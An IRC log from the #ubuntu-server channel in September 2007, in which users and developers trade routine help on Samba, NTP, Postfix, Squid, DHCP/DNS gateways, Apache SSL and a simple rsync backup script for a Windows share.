<ScottK> While the accounts have the same name, they are not the same accounts.
<ScottK> IIRC the way to avoid this is to have a backup domain controller and restore the accounts from there.
<renzo17> ScottK: thanks, i was afraid someone might say that
<ScottK> It's been a while though.
<renzo17> was incredibly tedious copying everyone files, bookmarks, outlooks etc from their old accounts to their new ones
<ScottK> Get a backup domain controller.
<ScottK> It doesn't have to be expensive or even a dedicated machine.
<renzo17> cool thanks, how do i make it a backup?
<ScottK> That would be where my ability to help runs out.  It's been a long time since I had to worry about such things.
<ScottK> Sorry.
<renzo17> lol, no probs, thanks anyway
<renzo17> i've google for some howtos
<renzo17> ^googleD
<Stonekeepe1> Hi all. Does anyone know a good url for setting up NTP on feisty server? I've tried a lot and can't get it to work. Thanks.
<Stonekeepe1> *NTP-server
<Nafallo> Stonekeepe1: what do you need help with?
<renzo17> so can anyone explain how to set up samba as a backup domain controller (bdc)?
<soren> Stonekeepe1: You need a good ntp server address or a URL for a howto?
* Nafallo runs ntp0.magicalforest.se in pool.ntp.org now :-)
<Nafallo> @ europe uk :-)
<sommer_> renzo17: did you take a look at this url: http://www.samba.org/samba/docs/man/Samba-HOWTO-Collection/samba-bdc.html
<renzo17> no not yet, i was just rummaging the samba docs too, thanks sommer_
<sommer_> np
<sommer_> Stonekeepe1: did you see: https://help.ubuntu.com/7.04/server/C/NTP.html
<Stonekeepe1> sorry was afk
<Stonekeepe1> it seems that when i nmap the server, it says the port is open|filtered
<Stonekeepe1> no firewalls are running on it
<Stonekeepe1> or between the client and it
<Nafallo> Stonekeepe1: it's udp... what did you expect? :-)
<Nafallo> Stonekeepe1: the protocol is connectionless...
<renzo17> sommer_: sorry for being a n00b, but in that guide what is all the ldap stuff?
<Stonekeepe1> ok, so why are other posts on the net saying that it is just "open" ?
<Nafallo> Stonekeepe1: cause they isn't as good as nmap.
<sommer_> renzo17: LDAP is a protocol basically for serving directory style information:  https://help.ubuntu.com/7.04/server/C/openldap-server.html
<sommer_> Microsoft uses it in Active Directory and Novell's used it since NDS back in the day.
<renzo17> sommer_: thanks, so do i need it? my primary controller doesnt use it i dont think?
<Stonekeepe1> I'm getting "Server dropped: strata too high" messages?
<Stonekeepe1> Nafallo: heh, nmap rocks :D
<sommer_> renzo17: not necessarily, I believe the guide just recommends it because it can automatically sync usernames and passwords between machines.
<sommer_> if you don't use it you'll have to manually sync them.
<sommer_> depending on your environment this may not be too big a deal.  You could setup an rsync job for example.
<Nafallo> Stonekeepe1: I know
<Nafallo> Stonekeepe1: let it sync first.
<renzo17> sommer_: cool thanks, i'll have a try without first.......i'm gonna have to go find an old unused pc now
<sommer_> renzo17: probably a good idea LDAP can be a pretty big beast when you're new to it.
<Nafallo> Stonekeepe1: feel free to use ntp0.magicalforest.se (iPHouse, E14, London)
<ScottK> I've always found pool.ntp.org to be adequate.
<Nafallo> ScottK: my server is in there, but you can't use that if you want to be in there ;-)
<ScottK> Right.
<Nafallo> http://www.pool.ntp.org/user/NafalloBjalevik
<ScottK> Cool.
<Nafallo> http://stats.magicalforest.se/magicalforest.se/lumberjack.magicalforest.se-ntp_states.html
<Nafallo> :-)
<Stonekeepe1> Nafallo: i'm using janet ntp servers
<Nafallo> Stonekeepe1: oki. you don't have to ;-)
* Nafallo uses 6 diverse stratum2-servers for the time being.
<Stonekeepe1> yay! it's now working - weird. must jst be a time delay issue
<^robertj> soren: I was reading the thread RE: samba back ports (the one from THE YELLING GUY) , and it seems to me that your proposition of a is the definition of what the S in LTS is all about, and that if there is noone to do that work then an LTS shoudln't be cut at all. Thoughts?
<^robertj> (that assumes that his statement about there being serious interoperability problems with Vista is correct, I haven't kept up)
<Nafallo> Stonekeepe1: like I said... the server needs to sync its status up from stratum16 before its a valid source.
<soren> ^robertj: Hang on, I need to reread the bug.
<soren> ^robertj: Yes, a) is the option we've usually used.
<soren> ^robertj: We, however, suggests that the samba version in Dapper is so completely and utterly broken that this would take ages.
<^robertj> soren: yes, its undoubtedly boring as crap, a time-sink, and going to leave at least some people unhappy, but to me thats what LTS is all about
<soren> ^robertj: I should of course have pointed out that we prefer a) and we probably need all the help we can get in pinpointing those bugs (i.e. "OMGWTF1337BBQ!!!1!!one! IT'S ALL COMPLETELY BROKEN! BREAK IT FOR EVERYONE ELSE!")
<soren> Er... something other than what was in those parentheses.
<soren> ^robertj: We're not going to honour a "I think it's all complete crap. Please update to the latest crack, so that I can shut up again." That's not how it works. He needs to report bugs about specific issues, so that we can fix specific issues. "Samba is old in Dapper" is not a specific issue.
<^robertj> soren: oh no, not advocating that you do at all. I'm just a tad worried that the time and monkey sink that is process a is going to go underfunded & understaffed in the long run
<^robertj> soren: and you really can't rely on volunteer labor when doing an LTS it seems if you are _really_ supporting it
<soren> ^robertj: We are indeed supporting it, I believe. If people file bugs that are not crackful, we evaluate the impact and whether it's worth the risk.
<soren> ^robertj: Hang on, I'll follow up on the bug.
<^robertj> IMO it should be closed in either 1 of 2 ways
<^robertj> 1. there should be a new meta-bug referencing specific issues for a roll-up fix in a single update and this should be closed as a duplicate of that bug
<^robertj> 2. it should be closed as general complaining NOTABUG or some such and invite him to resubmit specific problems so they can be investigated
<soren> ^robertj: I'm doing 2) right now :)
<Nafallo> anyone worked with Dells PERC?
<Nafallo> never mind. I aborted
<ivoks> 'evening
<lamont`> ScottK: re 137779: postfix/dapper recommends: mail-reader or such, and emacs is probably getting dragged in to satisfy that.
<lamont`> tell him to install mutt. :-)  or use apt :-)
* lamont` -> dr appt
<ScottK> I already asked him what happens if he tries apt.
<ScottK> Thanks.  We'll see.
<nealmcb> bug 137779
<ubotu> Launchpad bug 137779 in postfix "Dapper Server: Postfix dependency on emacs?" [Undecided,New]  https://launchpad.net/bugs/137779
#ubuntu-server 2007-09-07
<CuriosCat> Hi all
<wasabi> https://bugs.launchpad.net/ubuntu/+source/samba/+bug/137859
<ubotu> Launchpad bug 137859 in samba "winbind cache does not work on 3.0.25b-1" [Critical,New] 
<wasabi> Anybody mind advising me on how to handle that? I'd like to get it fixed.
<osmosis> where can I download gutsy server ?
<osmosis> it should be pretty stable by now, and I can upgrade to final just by apt-get upgrade when it comes out I figure.
<ScottK> You can.
<ScottK> I wouldn't run it on a production server because stuff happens, but for development it should be generally fine.
<osmosis> it will be a production server, but probably not for a month...and by then gutsy should be released. So i figure better off starting with gutsy.
<ScottK> osmosis: The dailies are here: http://cdimage.ubuntu.com/ubuntu-server/daily/
<ScottK> OK.
<osmosis> this will be my first time doing 64 bit also.
<osmosis> gutsy is already frozen right? Just bug fixes now.
<ScottK> Mostly.
<ScottK> There are exceptions granted if there is a good reason.
<osmosis> oh cool.
<osmosis> like that xorg hotplugging devices that was just released ?
<ScottK> Dunno about that.
<ScottK> I mostly work on Universe packages.
<maestrojed> I just set my Ubuntu desktop (feisty) to be a LAMP server.  By default /var/www belongs to root which means I can't work in it via the gui.  Is there any reason I should not change the ownership and group to my account (I am only running one main account)?
<duluu> hello everyone
<duluu> I'm looking for a tool that logs all the command entered in a login session
<ajmitch> history
<ajmitch> though it'll show more than just the current bash session, iirc
<duluu> it seems not working after someone SU-s to another user
<ajmitch> which is why sudo is really useful
<duluu> what if someone issues sudo su?
<ajmitch> then the history gets stored for root, not for the original user
<duluu> ajmitch: I know
<duluu> ajmitch: but I want to log all the commands entered during login session
<ScottK> duluu: It probably wouldn't be terribly hard to script merging the two logfiles.
<pschulz01> Greetings.. I would like to help out with some ubuntu-server documentation, but not sure where the best place to start is. Given that today has been declared DocDay.
<duluu> ScottK: but there might be some better tools
<ScottK> Might be.
<AnRkey> how do get my squid box to allow connections to local machines on my network. (Intranets)
<Kamping_Kaiser> AnRkey, hm?
<AnRkey> well at the moment i have to add proxy exclusions into the browser for local machine names
<AnRkey> otherwise squid denies access
<kgoetz> look at teh ACL section of the config, might help
<AnRkey> i have created an acl for all the intranet dns names
<AnRkey> and then I am trying to get squid to fetch it directly
<AnRkey> almost there
<mico> anyone can help setting up ldap in feisty ?
<sommer_> mico: maybe do you have a specific question?
<renzo17> mico: would this help https://help.ubuntu.com/community/OpenLDAPServer?highlight=%28ldap%29
<sommer_> here's another link: https://help.ubuntu.com/7.04/server/C/openldap-server.html
<mico> tnks renzo17
<mico> sommer_
<mico> i'll try that
<mico> I have to install a server with    openldap, squid, dansguardian, and bind           is there any order or can I just add them all at the same time ?
<mico> and manage tham via webmin
<mico> them*
<ScottK> !webmin | mico
<ubotu> mico: webmin is no longer supported in Debian and Ubuntu. It is not compatible with the way that Ubuntu packages handle configuration files, and is likely to cause unexpected issues with your system
<gamble6x> I'm not speaking from experience with these particular apps.  But I would get them all at the same time.  Aptitude takes into account dependencies and whatnot of apps already installed as well as those being installed.  So choosing them all will allow aptitude to decide what order is best.
<mico> iwuh   :(
<mico> tnks
<mico> tnks  gamble6x
<mico> can anyone poit me to a url focusing feisty server configs ?   pl
<sommer> mico: https://help.ubuntu.com/7.04/server/C/
<sommer> also you can search through the community docs at: https://help.ubuntu.com/community/
<sommer> you might get more mileage if you search for a specific service like apache
<nealmcb> new roadmap item for ubotu factoids (my action item from the last meeting): https://wiki.ubuntu.com/ServerTeam/Roadmap#factoids
<mathiaz> !mail
<ubotu> mail is another medium to communicate. Ubuntu mailinglists can be found at http://lists.ubuntu.com
<mathiaz> nealmcb: hum.. I wouln't try to update the mail factoid
<mico> tnks guys
<mathiaz> nealmcb: may add a mail-server factoid ?
<mico> i'm feeling little right now :s     can't put this server working :s  all in the net points some direction ....   the wrong one  :s
<nealmcb> mathiaz: good idea
<nealmcb> what is a good way to look for, e.g., all the packages that match some criteria, but only in the "main" component.  I don't see an option in apt-search for component
<nealmcb> I guess the search at http://packages.ubuntu.com/ does a reasonable job
<nealmcb> mico: what kind of server do you want to run?
<mico> it's 4 a school
<mico> the students net
<mico> with a server and about 50 computers connected to it
<mico> so I'll need dansguardian, bind9, ldap,
<mico> and squid
<mico> any suggestions ?
<mathiaz> mico: it seems that you already know which package you need.
<mathiaz> mico: you can find them in the archive and install them.
<mathiaz> mico: help.ubuntu.com has lots of ressources
<mathiaz> mico: you can find there a server guide
<mathiaz> mico: and some wiki pages about installing packages in the community section.
<mathiaz> mico:  have a look at it and feel free to update pages when they're not relevant anymore.
<mico> mathiaz ok man
<mico> mathiaz tnks
<mico> WHEN  i'll make it, i'm thinking to make a site with those instructions
<mathiaz> mico: that's great news. May be you could try to improve the help.ubuntu.com ?
<mathiaz> mico: so that other can easily find your documentation and don't have to go through the same problem as you.
<mico> mathiaz i'm thinking in that ..... 4 other ubuntuers don't have the same dificulty i'm having
<mico> mathiaz that's it lol
<mathiaz> mico: the help.ubuntu.com/community/ is a wiki website
<nealmcb> mico: yeah - sometimes is is much better for someone inexperienced to review and give feedback on the documentation - it is sometimes very hard for folks who know it already to notice parts that are confusing
<mathiaz> mico: so it's easy to edit pages and so on.
<mico> mathiaz guys .... i'm not placing wiki ubuntu forums lower or anything ... but I consider myself a newbie ... i used to feel confortable in w#n and I went many times 4 the same problem
<mathiaz> I've updated the https://wiki.ubuntu.com/ServerTeam/KnowledgeBase wiki page
<mathiaz> someone wants to have a look at it to see if things are missing ?
<mathiaz> mico: that's not a problem. We have all these documentation for people like you.
<mathiaz> mico: so if you see something that doesn't work, you can ask here or even correct it if you've found a solution
<ScottK> mathiaz: Comment for you... In triaging it might be worth mentioning that there is no point in assigning/subscribing the server team to bugs on server team packages as the team is bug contact for all those packages already.
<mathiaz> ScottK: would it make a difference if the ubuntu-server team is subsribed ?
<mathiaz> ScottK: I don't think we'd get two emails
<ScottK> No we wouldn't, but it's more work for triagers.  I'd say at least warn them it's pointless.
<mathiaz> ScottK: Ok. Thanks.
<angelic_venus> Hello all =). Does anyone know if the postfix package (2.3.8-2) on 7.0.4 Server is supposed to provide library file '/usr/lib/postfix/dict_sdbm.so'?
<angelic_venus> Postfix isn't working and complains about not being able to find it
<mralphabet> angelic_venus: how did you install postfix?
<lamont> angelic_venus: hrm...
* lamont goes looking
<angelic_venus> apt-get install postfix
<angelic_venus> and various other packages
<angelic_venus> (postfix related)
<lamont> angelic_venus: sdbm is built in
<lamont> not provided by a loadable map
<lamont> see postconf -m
<angelic_venus> ah, okay
* angelic_venus fiddles some more
<lamont> otoh, that might not be true...  sigh
<lamont> iz builtin
<lamont> objdump --dynamic-syms /usr/lib/libpostfix-util.so.1| grep sdbm
<angelic_venus> Perhaps I am in a little over my head xD
<angelic_venus> the error I am getting on 'postfix set-permissions' is: chown: cannot access `/usr/lib/postfix/dict_sdbm.so': No such file or directory
<lamont> ah, well.  postfix fiels
<lamont> and you shouldn't be running set-permissions anyway - postinst does all that for you
<nealmcb> for future reference, if you install apt-file you can search for pacages that include a given file:  'apt-file search /usr/lib/postfix/dict_sdbm.so' (and dpkg -S can do that for packages you've already installed)
<angelic_venus> aye, I tried that
<angelic_venus> but yeh, I am now none the wiser as to what could be causing my postfix woes =(
<lamont> and what woes are those?
<angelic_venus> when I try to send a test message over telnet, it hangs after MAIL FROM: <blah@blah.com>
<angelic_venus> and the logs have:
<angelic_venus>  postfix/smtpd[29995] : warning: connect #1 to subsystem private/rewrite: Connection refused
<angelic_venus> etc
<lamont> hrm... that would point to a permissions issue
<lamont> or that the rewrite service had died earlier in the log
<angelic_venus> No other log output, so perhaps the former
<lamont> removing dict_sdbm.so from postfix-files and running postfix set-permissions might do the trick for you
<angelic_venus> well, that's just it, I did a search for dict_sdbm.so and it came up with nothing
<angelic_venus> alas, I must leave, thank you for your help
<sllik> hi guys, i just installed ubuntu server and for some reason I cant read the files on a cdrom
<osmosis_> sllik: bummer
<sllik> if I ls /media/cdrom there is nothing there
<sllik> any ideas?
<mico> goin home :p i'm tired
<mico> tnks 4 the hlp guys
<nealmcb> sllik: perhaps you have to manually mount the cdrom?  when you have gnome, nautilus may do that automatically, but I'm not sure how that is handled.  does the cdrom show up on the output of "mount"?
<sllik> nealmcb, i can't even find it in dev something is really wrong
<nealmcb> mathiaz: thanks for the good work on https://wiki.ubuntu.com/ServerTeam/KnowledgeBase    I'm making some updates now
<nealmcb> mathiaz: I've made some changes to the KnowledgeBase.  I wonder if we should move packager below developer?  Starting with the easy stuff and getting more advanced....  Adding links for minutes and meeting agendas?  I'm a little unclear on how this page should differ from the main page and the GettingInvolved page
<mathiaz> nealmcb: hum. I agree with you.
<mathiaz> nealmcb: I'm not sure about what we should put there.
<mathiaz> nealmcb: I think I'd put links to ressource so that people can do their job
<juliux> hi
<juliux> has somebody experiences with mondo  and server backuping? http://www.mondorescue.org/
<mathiaz> nealmcb: I've added a paragraph about the meetings.
<mathiaz> nealmcb: I think the KnowledgeBase is about how the team functions.
<mathiaz> nealmcb: People that want to get involve would first go to the GettingInvolved page
<mathiaz> nealmcb: then a choose a task to work on.
<mathiaz> nealmcb: and when they ask themselves - oh, I should I do the task - can you help in doing that specific task ?
<mathiaz> nealmcb: then they should find pointer in the KnowledgeBase.
<nealmcb> mathiaz: good description.  I also found this set of "SampleTeam" templates that give more detail: https://wiki.ubuntu.com/BuildingCommunity/SampleTeam
<nealmcb> it describes KnowledgeBase as sort of the virtual library of the team
<mathiaz> nealmcb: yop.
<mathiaz> nealmcb: It links to the LOCO knwoledgebase as an example.
<mathiaz> nealmcb: in that case it describes how to run a loco team.
<m11> evening all
<mathiaz> hi m11
<m11> hi mathiaz
<m11> i have little problem with ssl on ubuntu server
<m11> i am trying to folow ubuntu guide : https://help.ubuntu.com/community/WifiDocs/ChillispotHotspot
<m11> but i cant pass apache2 ssl section
<m11> any tips ?
<m11> i have installed openssl ca-certificates ssl-cert and there i stoped
<sommer> m11: you may want to check this out: https://help.ubuntu.com/7.04/server/C/httpd.html
<m11> ty sommer , i check
<sommer> there's a section on createing certs and using them with Apache
<sommer> once you have Apache running with ssl, you might then resume the ChillispotHotspot guide.
<m11> ty for help somer. what should i do with openssl ca-certificates ssl-cert packages ? uninstall ?
<sommer> m11: nope you'll need those to create the certificates that Apache will use.
<m11> i c
<m11> i go check now, many tnx sommer
<sommer> np
<SuperLag> sweet
<SuperLag> I want to fire off some reports that run on an Ubuntu server, to an open relay and mail them to a group of people. This box would send mail but never receive. What would be the best setup for that?
<ScottK> SuperLag: Do you have any experience with mail server software?
<SuperLag> ScottK: very little. Tried to set up postfix and a virtual host a couple years ago, and it made me crazy.
<ScottK> OK.
<SuperLag> What was suggested to me, was to set up $some_mta and point it at an open relay
<ScottK> Is the server going to be exposed to the internet or inside a private network.
<SuperLag> inside a private network
<ScottK> Open relays don't generally exist anymore.  Your MTA will have to deliver to the appropriate MX.
<ScottK> In that case, you can probably use most anything as the security considerations are less.
* ScottK would just use Postfix because it's what I'm familiar with.
<SuperLag> I just think if I use Postfix and try to mail directly to Exchange users that it'll get caught up in the firewall somewhere.
<SuperLag> I'm not sure.
<SuperLag> The people the reports go to are Windows users.
<ScottK> Can your telnet to the exchange servers on port 25 from the Ubuntu server?
<SuperLag> and we use Exchange, in house...
<ScottK> your/you
<SuperLag> let me see...
<ScottK> If you can do that, you don't need a relay.  If you can't you'll need to work the firewall issue as any solution dependent on some open relay somewhere on the net isn't going to be very reliable.
* ScottK has to run. 
<ScottK> Good luck.
<knix_> I need to be able to make a cron job to backup a directory on a windows machine to a ubuntu file server.  How would I accomplish this?
<ivoks> share that dir on windows
<ivoks> mount it, copy data from it, umount it
<knix_> sorry.  I meant automatically.
<knix_> like a daily cron job.  I assume I need to make a script, but I am not familiar with what to put in there.
<ivoks> mount -t smbfs //windows_ip/share_name /mnt/windows -o username=xxx,password=xxx
<ivoks> rsync -a /mnt/windows /backup/dir
<ivoks> umount /mnt/windows
<knix_> So make that a script and creat a cron job around that?
<ivoks> right
<knix_> Thanks a bunch ivoks
<ivoks> np
<ivoks> just a tought...
<ivoks> it would be good to test exit code of mount part
<ivoks> cause, you don't want to sync empty dir :)
<knix_> I hear ya
<knix_> I have to backup the firehouse's data.  If I cant do it, they will tell me to move to novell or windows.
<ivoks> :)
<ivoks> out of head:
<ivoks> mount -t smbfs //windows_ip/share_name /mnt/windows -o username=xxx,password=xxx
<ivoks> if [ $? -ne 0 ] ; then
<ivoks> echo "Windows share unaccessibile"
<ivoks> exit 1
<ivoks> else:
<ivoks> rsync -a /mnt/windows /backup/dir
<ivoks> umount /mnt/windows
<ivoks> fi
<ivoks> ups..
<ivoks> else
<ivoks> not else:
<m11> ivoks ? :)
<ivoks> m11: yes?
<m11> pozdrav
<m11> kako ide s firmom ?
<ivoks> m11: this is english only channel, switch to ubuntu-hr
<m11> ah ye sry
#ubuntu-server 2007-09-08
<hansin> Does anyone know why you can not set the framebuffer in GRUB in Ubuntu and get the kernel messages (or for that matter to get it to boot to a CLI only system)?  I'm talking about adding VGA=775 to the kernel line.
<hansin> It might just be on Gutsy.
<hansin> Yep, it is a Gutsy thing.  Other are posting the same problem in the internet.
<hansin> s/Others
<stonehelm> couple of questions about PAM and per-user limits: on a default system the max number of open-file (per user) is 1024, is this defined in the kernel?
<stonehelm> and how can I check the current number of open files for a user? is lsof |wc -l enough?
<admin21ten> hello all
<admin21ten> is this a user support or a developer channel?
<Nafallo> both AFAIK
<Nafallo> admin21ten: please read the topic :-)
<admin21ten> I just installed ubuntu server and I am trying to setup a gateway which will take a wireless signal on ra0 and distribute it on eth0 to several APs which will hook to it on a switched network
<admin21ten> with that context, I was wondering if anyone could provide me with information on packages that would make this easier to do
<admin21ten> s/information/recomendations
<admin21ten> I had previously installed IPCOP, but I was unable to set the wireless card up as the RED interface
<admin21ten> ATAWolfpack: what up, fellow kcluger!
* admin21ten aka luckyone
<ATAWolfpack> Howdy!
<admin21ten> ATAWolfpack: care to help me decide on some packages which will make managing my building's router/gateway a little easier?
<admin21ten> ATAWolfpack: I tried IPCOP before but couldn't get it to let me use ra0 as RED interface
<admin21ten> now I am on good ol' ubuntu, I have the wireless interface ra0 configured as my primary, and I am connected on it right now
<admin21ten> ATAWolfpack: now I just need to figure out how to share this connection with eth0 and configure eth0 to be what my GREEN network would have been in IPCOP
<ATAWolfpack> Hmm
<ATAWolfpack> i don't know much about IPCOP.. i mostly use shorewall or firestarter
<admin21ten> does shorewall have a gui?
<admin21ten> I think that is what I want to use
<ATAWolfpack1> bloody hell... the wireless here is REALLY messed up.
<ATAWolfpack1> Shorewall doesn't have a GUI.  it's entirely command based.  it uses configuration files to build the iptables rules
<admin21ten> hmm, I am worried that will be a little over my head and very much over the head of the person who manages this when the day comes for me to move out
<admin21ten> I mean, it isn't really the firewall part that I am worried about, it is more about configuring the gateway
<admin21ten> that is all I need to do to get this part of the project done
<admin21ten> we will not be on the big, bad internet... we are simply taking the library's wifi signal and distributing that across our building
<jbrouhard> Smoothwall is fairly straightforward.
<jbrouhard> the configs are pretty much written in end-user language
<admin21ten> cool
<admin21ten> does it allow me to do what I want to do?
<admin21ten> ie, dhcp and configure a gateway
<jbrouhard> I think so
<jbrouhard> Well, yeah
<jbrouhard> DHCP is external
<jbrouhard> if you want a howto, i have one
<admin21ten> how to set up shorewall?!?
<admin21ten> or DHCP?
<admin21ten> the DHCP part I am less worried about it, I am thinking I might just have the WRT54GL's handle that at the AP level and give them static addresses
<admin21ten> jbrouhard: what do you think of smoothwall?
<peanutb> hmm. anyone know why lsb_release might be takeing up 99% of the CPU?
<peanutb> im on a dapper VPS
<peanutb> admin21ten, shorewall is great if you want a dedicated box as a DHCP server. What it lacks is easy expandibility
* peanutb has one sitting behind him
<peanutb> its a bit of a waste of power
<peanutb> i recomend something that can provide more features such a ebox ect
<ATAWolfpack> doh
<jbrouhard> admin21ten  sorry about that
<jbrouhard> admin21ten How many computers are in question ?   you can use static IP for probably up a handful of computers
<jbrouhard> but if you have a large # of computers (say more than a dozen) DHCP is really the best way to go
<admin21ten> jbrouhard: sorry, was reading shorewall doc and I don't have this screen set up to tell me about alerts in other screens...
<jbrouhard> NP
<admin21ten> jbrouhard: there will be 7-8 AP's that I would address statically, then let them use dhcp to issue addresses
<jbrouhard> I have a debian firewal how-to..
<jbrouhard> includes DHCP, Shorewall, Cacheing DNS
<admin21ten> donde?
<jbrouhard> donde ?
<jbrouhard> huh?
<admin21ten> where?
<admin21ten> heh
<jbrouhard> LOL
<jbrouhard> I'm planning to adapt and modify this for Ubuntu-Server, maybe include it as a SOHO option
<jbrouhard> http://www.cyberdogtech.com/firewalls/
<jbrouhard> and FYI, i really don't recommend linux as an AP
<jbrouhard> :)
<admin21ten> BSD?
<jbrouhard> unless you're using a commercial AP.
<jbrouhard> meh
<jbrouhard> Never heard of much luck using anything other than hardware-based AP's.
<admin21ten> really, so you think it is going to be tough to for me to set this up?
<admin21ten> what I want to do seems simple to me
<admin21ten> take ra0, share that over eth0 and let 7-8 wireless ap's connect to it
<jbrouhard> hmm
<jbrouhard> Maybe i'm not getting this
<jbrouhard> ra0 is what?  your internet link ?
<admin21ten> yes
<jbrouhard> or wireless ?
<admin21ten> ra0 is the wireless nic that will connect to the Downtown Library's wifi network
<jbrouhard> I see.
<admin21ten> (they are proponents of this btw)
<jbrouhard> heh
<admin21ten> so this box is responsible for connecting to that signal, then feeding the network we build in house
<jbrouhard> hmm
<jbrouhard> to keep it simple and not mess with your brain...
<admin21ten> hah
<jbrouhard> I'd set up a router/gateway on the box in question, and use your own IP address network.
<jbrouhard> i'm presuming that's your opinion ?
<admin21ten> yes
<admin21ten> that is exactly what I want to do
<jbrouhard> hmm
<jbrouhard> the howto i sent you should do the trick just as easily.
<jbrouhard> you should be able to modify the howto to work with *buntu, since it's based on debian
<admin21ten> jbrouhard: quick question for you... if ifconfig doesn't show my eth0 card (I thought it did, and it is recognized in lspci) what do I need to do to get it to show up?
<jbrouhard> check /etc/network/interfaces
<jbrouhard> eth0 may not be set to "auto"
<admin21ten> not listed
<m11> hello
<jbrouhard> not listed?
<admin21ten> jbrouhard: not listed, do I just need to define the interface there?
<jbrouhard> may have to manually add it then
<jbrouhard> probably
<admin21ten> jbrouhard: cool, no problem
<jbrouhard> ok.. going home.  adios
<admin21t1n> anyone in here have any experience with dchp3-server?
<admin21t1n> I am trying to tell dhcp3-server to use eth0 as it's interface
<admin21t1n> not sure where to specify with the ubuntu package
<admin21t1n> I am trying to configure my home firewall/router/gateway and I am having trouble with things connected to it being able to do dns lookup
<admin21t1n> can anyone help me?
<mindframe-> what options would be wise when using cp for complete filesystem backup?
<mindframe-> admin21t1n, have you specified a dns server in your dhcp server config?
<admin21t1n> mindframe-: my dhcpd.conf contains the line 'option domain-name-servers 10.160.1.1'
<admin21t1n> mindframe-: my dhcpd.conf contains the line 'option domain-name-servers 10.160.1.1;'
<admin21t1n> which is the same box as the firewall, I am trying to use a dnscache
<mindframe-> ah
<admin21t1n> via dnsmasq
<mindframe-> not familiar with configuring dnsmasq
<admin21t1n> can someone help me figure out why dns look up isn't working?
#ubuntu-server 2007-09-09
<rabidsnail> In the installer, how do I drop to a shell?
<raky> i'm new to amd.  what are the diff versions of "installer-amd64" in the ubuntu archives?  is amd a work-in-progress?
<raky> oh, i see i386 hs the same, n/m
<soren> raky: Press Alt-F2 :)
<soren> raky: Sorry, not for you :)
<soren> rabidsnail: Press Alt-F2 :)
<rabidsnail> thanks
<m11> hi all
<kgoetz> hi
<m11> hi kgoetz
<m11> i am having little problem in setting up ssl with apache in ubuntu
<kgoetz> hm. not able to help ou myself
<m11> ok , tnx :)
<spiekey> hi
<spiekey> how can i get rid of this?: slapd[4498] : OTP unavailable because can't read/write key database /etc/opiekeys: No such file or directory
<spiekey> i dont have or want one time passwords
<pmj0383> i have some general questions regarding the best way to setup a user for ftp, editing the website, etc
<pmj0383> anyone good with that stuff?
<pmj0383> :/
<kgoetz> pmj0383: ask your question, if someone can help they willl reply
<kgoetz> and you might have to wait a while
<pmj0383> its a few questions really, ill just say what I want: I create my website on one machine, I want a user account with no priviledges to anything else besides ftp'ing and transferring the website over
<pmj0383> so should I give this account ownership of apache's DocumentRoot?
<pmj0383> and is there any way to not let the account see anything else besides that
<m12> hi all
<kgoetz> wb
<m12> hey :)
<kgoetz> make sure yo dont clone to much. freenode will ban you if you connect 3 or 4 times from one address
<m12> i c
<m12> tnx for tip
<m12> kgoetz , can u help with network interfaces ?
<m12> i have some strange behaviour, i can ping my router but i cant get out
<m12> hi ivoks
<kgoetz> m12: i can try
<ivoks> hi all
<kgoetz> ivoks: hey mate
<m12> when i ping router on 1.1 it reply , but when i ping google.com it says: unkown host
<m12> i have same setup on his laptop as on server and it works ok
<kgoetz> m12: if you run `host google.com` do you get a reply?
<kgoetz> if not look at /etc/resolv.conf
<m12> says connection timed out
<m12> ok i check
<ivoks> anyone has any experience with ldirectord?
<m12> /etc/resolv.conf is empty
<kgoetz> ivoks: sorry, not me
<kgoetz> m12: thats your problem
<kgoetz> you cant do dns lookups
<kgoetz> ivoks: whats your router (1.1)?
<ivoks> router?
<kgoetz> er, sorry ivoks , that was to m12
<ivoks> :)
<kgoetz> :$
<m12> 1.1
<m12> ok i edited resolv.conf and is working now
<m12> tnx kgoetz
<m12> was thinking somthing went wrong with wlan card
<kgoetz> m12: np
<kgoetz> m12: if your using dhcp, thats a bad thing (empty resolv.conf) if you did it static, its probably to be exptected
<m12> kgoetz , on install i had only wlan card in so it didnt setup network on install
<kgoetz> m12: oh right.
<m12> one more question, when i do update n upgrade, why it leaves new kernel out of it and i have to install it manually  ?
<ivoks> dist-upgrade it
<ivoks> upgrade never installs new packages
<kgoetz> m12: dist-upgrade, upgrade is... crud
<ivoks> dist-upgrade installs new packages, if needed
<kgoetz> ^^^
<m12> i c, tnx guys :)
<kgoetz> btw, apt-get is officaly depreciated as package mangement... your *meant* to use aptitiude
<kgoetz> fwiw, i never do (hate the tool)
<m12> ivoks , we talked other night for croatian language and keyboard on server, do you know workaround for that problem ?
<ivoks> m12: use english layout :)
<m12> damn :/
<m12> i cant even do lsmod |
<m12> there goes my wlan
<m12> never buy dlink usb wlan adapter
<kgoetz> never buy anyting usb if you can help it
<m12> :)
<kgoetz> :)
<spiekey> how can i get rid of this?: slapd[4498] : OTP unavailable because can't read/write key database /etc/opiekeys: No such file or directory
<spiekey> i dont have or want one time passwords
<nealmcb> ajmitch: where is fds on alioth?
<nealmcb> Is it "Linux Active Directory Replacement"?  http://alioth.debian.org/projects/ladr/  "This project's administrator will have to grant you permission to view this page."
<nealmcb> Re: Status: New => Fix Released  for http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=315297
<ubotu> Debian bug 315297 in wnpp "ITP: fedora-directory-server -- An LDAP server designed to manage large directories of users and resources" [Wishlist,Open] 
<Yahooadam> im having problems with the ubuntu fiesty server install CD
<Yahooadam> warning:
<Yahooadam> file:///cdrom/pool/main/l/langpack-locales/locales_2.3.23_all.deb was corrupt
<Yahooadam> ive re-downloaded the image and reburnt it, with the same problem
<kgoetz> check the CD image
<Yahooadam> the ./pool/main/l/linux-source-2.6.20/linux-image-2.6.20-15-server-bigron_2.6.20-15.27_i386.deb file failed the md5 checksum verification
<Yahooadam> download it again ?
<Yahooadam> (the cd that is)
<kgoetz> Yahooadam: boot the cdrom, and use theverify cdrom
<kgoetz> or similar name
<kgoetz> see if it fails
* kgoetz suspets your cdburner is awol
<Yahooadam> i did, i got that error
<Yahooadam> hmm
<Yahooadam> wheres the MD5 checksum for the iso image ?
<kgoetz> on the cd is a file with teh md5sums of all othe rfiles
<Yahooadam> so theres no way to check the md5 of the iso image before i burn it ?
<kgoetz> run md5sum <isoname.is.o>
<kgoetz> and compare it to the md5sum file in the website you got the iso from
<Yahooadam> kk got it :)
<kgoetz> :)
<Yahooadam> well my iso MD5's ok
<Yahooadam> so guess its my burner
<kgoetz> Yahooadam: put the cdrom in the drive, then md5sum the crom devicd
<Yahooadam> cant do that on winblows :p
<Yahooadam> and my other linux machine is currently missing its screen and keyboard for my server :p
<kgoetz> :(
